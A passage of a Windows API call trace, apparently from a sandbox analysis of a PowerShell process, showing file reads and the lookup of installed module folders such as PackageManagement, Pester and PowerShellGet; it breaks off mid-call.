[0332.003] ReadFile (in: hFile=0x794, lpBuffer=0x238f319, nNumberOfBytesToRead=0x3, lpNumberOfBytesRead=0x1b62d5d8, lpOverlapped=0x0 | out: lpBuffer=0x238f319*, lpNumberOfBytesRead=0x1b62d5d8*=0x3, lpOverlapped=0x0) returned 1 [0332.003] ReadFile (in: hFile=0x794, lpBuffer=0x238f770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62d5d8, lpOverlapped=0x0 | out: lpBuffer=0x238f770*, lpNumberOfBytesRead=0x1b62d5d8*=0x1000, lpOverlapped=0x0) returned 1 [0332.009] ReadFile (in: hFile=0x794, lpBuffer=0x238f322, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x1b62d5d8, lpOverlapped=0x0 | out: lpBuffer=0x238f322*, lpNumberOfBytesRead=0x1b62d5d8*=0x4, lpOverlapped=0x0) returned 1 [0332.010] ReadFile (in: hFile=0x794, lpBuffer=0x238f770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62d5d8, lpOverlapped=0x0 | out: lpBuffer=0x238f770*, lpNumberOfBytesRead=0x1b62d5d8*=0x1000, lpOverlapped=0x0) returned 1 [0332.013] ReadFile (in: hFile=0x794, lpBuffer=0x238f320, nNumberOfBytesToRead=0xa, lpNumberOfBytesRead=0x1b62d5d8, lpOverlapped=0x0 | out: lpBuffer=0x238f320*, lpNumberOfBytesRead=0x1b62d5d8*=0xa, lpOverlapped=0x0) returned 1 [0332.013] ReadFile (in: hFile=0x794, lpBuffer=0x238f770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62d5d8, lpOverlapped=0x0 | out: lpBuffer=0x238f770*, lpNumberOfBytesRead=0x1b62d5d8*=0x1000, lpOverlapped=0x0) returned 1 [0332.020] ReadFile (in: hFile=0x794, lpBuffer=0x238f770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62d598, lpOverlapped=0x0 | out: lpBuffer=0x238f770*, lpNumberOfBytesRead=0x1b62d598*=0x1000, lpOverlapped=0x0) returned 1 [0332.027] ReadFile (in: hFile=0x794, lpBuffer=0x238f31b, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1b62d5d8, lpOverlapped=0x0 | out: lpBuffer=0x238f31b*, lpNumberOfBytesRead=0x1b62d5d8*=0x1, lpOverlapped=0x0) returned 1 [0332.027] ReadFile (in: hFile=0x794, lpBuffer=0x238f770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62d598, lpOverlapped=0x0 | out: lpBuffer=0x238f770*, lpNumberOfBytesRead=0x1b62d598*=0x1000, lpOverlapped=0x0) returned 1 [0332.033] ReadFile (in: hFile=0x794, lpBuffer=0x238f319, nNumberOfBytesToRead=0x3, lpNumberOfBytesRead=0x1b62d5d8, lpOverlapped=0x0 | out: lpBuffer=0x238f319*, lpNumberOfBytesRead=0x1b62d5d8*=0x3, lpOverlapped=0x0) returned 1 [0332.033] ReadFile (in: hFile=0x794, lpBuffer=0x238f770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62d598, lpOverlapped=0x0 | out: lpBuffer=0x238f770*, lpNumberOfBytesRead=0x1b62d598*=0x1000, lpOverlapped=0x0) returned 1 [0332.035] ReadFile (in: hFile=0x794, lpBuffer=0x238f31a, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0x1b62d5d8, lpOverlapped=0x0 | out: lpBuffer=0x238f31a*, lpNumberOfBytesRead=0x1b62d5d8*=0x2, lpOverlapped=0x0) returned 1 [0332.035] ReadFile (in: hFile=0x794, lpBuffer=0x238f770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62d598, lpOverlapped=0x0 | out: lpBuffer=0x238f770*, lpNumberOfBytesRead=0x1b62d598*=0x1000, lpOverlapped=0x0) returned 1 [0332.037] ReadFile (in: hFile=0x794, lpBuffer=0x238f31d, nNumberOfBytesToRead=0xd, lpNumberOfBytesRead=0x1b62d5d8, lpOverlapped=0x0 | out: lpBuffer=0x238f31d*, lpNumberOfBytesRead=0x1b62d5d8*=0xd, lpOverlapped=0x0) returned 1 [0332.037] ReadFile (in: hFile=0x794, lpBuffer=0x238f770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62d5d8, lpOverlapped=0x0 | out: lpBuffer=0x238f770*, lpNumberOfBytesRead=0x1b62d5d8*=0x1000, lpOverlapped=0x0) returned 1 [0332.044] ReadFile (in: hFile=0x794, lpBuffer=0x238f31d, nNumberOfBytesToRead=0xc, lpNumberOfBytesRead=0x1b62d5d8, lpOverlapped=0x0 | out: lpBuffer=0x238f31d*, lpNumberOfBytesRead=0x1b62d5d8*=0xc, lpOverlapped=0x0) returned 1 [0332.044] ReadFile (in: hFile=0x794, lpBuffer=0x238f770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62d5d8, lpOverlapped=0x0 | out: lpBuffer=0x238f770*, lpNumberOfBytesRead=0x1b62d5d8*=0x1000, lpOverlapped=0x0) returned 1 [0332.046] ReadFile (in: hFile=0x794, lpBuffer=0x238f323, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x1b62d5d8, lpOverlapped=0x0 | out: lpBuffer=0x238f323*, lpNumberOfBytesRead=0x1b62d5d8*=0xf, lpOverlapped=0x0) returned 1 [0332.046] ReadFile (in: hFile=0x794, lpBuffer=0x238f770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62d5d8, lpOverlapped=0x0 | out: lpBuffer=0x238f770*, lpNumberOfBytesRead=0x1b62d5d8*=0x1a5, lpOverlapped=0x0) returned 1 [0332.047] GetEnvironmentVariableW (in: lpName="PSDisableModuleAnalysisCacheCleanup", lpBuffer=0x1b62d3e0, nSize=0xf1 | out: lpBuffer="") returned 0x0 [0332.050] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x1b62d4a8 | out: UnbiasedTime=0x1b62d4a8) returned 1 [0332.056] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x1b62d4b8 | out: UnbiasedTime=0x1b62d4b8) returned 1 [0332.059] CloseHandle (hObject=0x794) returned 1 [0332.060] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.psd1")) returned 0xffffffff [0332.060] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.psm1")) returned 0xffffffff [0332.061] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.cdxml")) returned 0xffffffff [0332.061] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.xaml")) returned 0xffffffff [0332.061] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.ni.dll")) returned 0xffffffff [0332.062] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.dll")) returned 0xffffffff [0332.062] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e648) returned 1 [0332.062] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0332.062] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x3d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0332.062] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x1b62e3f0 | out: lpFindFileData=0x1b62e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25c30b0c, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a899540 [0332.062] FindNextFileW (in: hFindFile=0x1a899540, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25c30b0c, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0332.063] FindNextFileW (in: hFindFile=0x1a899540, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa0cd22d5, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa0cd22d5, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="")) returned 1 [0332.063] FindNextFileW (in: hFindFile=0x1a899540, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0332.063] FindClose (in: hFindFile=0x1a899540 | out: hFindFile=0x1a899540) returned 1 [0332.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e348) returned 1 [0332.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e568) returned 1 [0332.063] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0332.063] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0332.064] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3d8) returned 1 [0332.064] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b62e700 | out: lpFileInformation=0x1b62e700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc998ac1f, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1997516a, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0x7b27e470, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x922)) returned 1 [0332.064] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e388) returned 1 [0332.064] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0332.064] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0332.064] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0332.064] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0332.064] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e418) returned 1 [0332.064] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x23f0430 | out: lpFileInformation=0x23f0430*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc998ac1f, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1997516a, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0x7b27e470, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x922)) returned 1 [0332.065] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e3c8) returned 1 [0332.065] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0332.065] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0332.065] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0332.065] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0332.066] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.ni.dll")) returned 0xffffffff [0332.066] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0332.066] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e648) returned 1 [0332.066] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x32 [0332.066] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x32, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0332.066] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x1b62e3f0 | out: lpFindFileData=0x1b62e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25c30b0c, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a89a320 [0332.067] FindNextFileW (in: hFindFile=0x1a89a320, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25c30b0c, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0332.067] FindNextFileW (in: hFindFile=0x1a89a320, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xb914059, ftLastAccessTime.dwHighDateTime=0x1d5ace1, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.4.0", cAlternateFileName="")) returned 1 [0332.067] FindNextFileW (in: hFindFile=0x1a89a320, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0332.067] FindClose (in: hFindFile=0x1a89a320 | out: hFindFile=0x1a89a320) returned 1 [0332.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e348) returned 1 [0332.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e568) returned 1 [0332.067] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0332.067] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x44, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0332.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3d8) returned 1 [0332.068] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.4.0\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b62e700 | out: lpFileInformation=0x1b62e700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dd42eab, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x19acc93c, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0x2dd42eab, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1014)) returned 1 [0332.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e388) returned 1 [0332.068] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0332.068] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x44, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0332.068] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0332.068] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x44, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0332.068] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e418) returned 1 [0332.068] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.4.0\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x23f1ee0 | out: lpFileInformation=0x23f1ee0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dd42eab, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x19acc93c, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0x2dd42eab, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1014)) returned 1 [0332.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e3c8) returned 1 [0332.070] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0332.070] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psm1")) returned 0xffffffff [0332.070] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.cdxml")) returned 0xffffffff [0332.070] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.xaml")) returned 0xffffffff [0332.071] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.ni.dll")) returned 0xffffffff [0332.071] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.dll")) returned 0xffffffff [0332.071] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e648) returned 1 [0332.071] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0332.071] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x39, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0332.071] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\*"), lpFindFileData=0x1b62e3f0 | out: lpFindFileData=0x1b62e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc86241be, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25c56c03, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a899900 [0332.072] FindNextFileW (in: hFindFile=0x1a899900, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc86241be, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25c56c03, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0332.072] FindNextFileW (in: hFindFile=0x1a899900, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc86241be, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa0cfdc3c, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa0cfdc3c, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="")) returned 1 [0332.072] FindNextFileW (in: hFindFile=0x1a899900, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0332.072] FindClose (in: hFindFile=0x1a899900 | out: hFindFile=0x1a899900) returned 1 [0332.072] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e348) returned 1 [0332.072] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e568) returned 1 [0332.072] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0332.072] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0332.072] SetThreadErrorMode (dwNewMode=0x1, 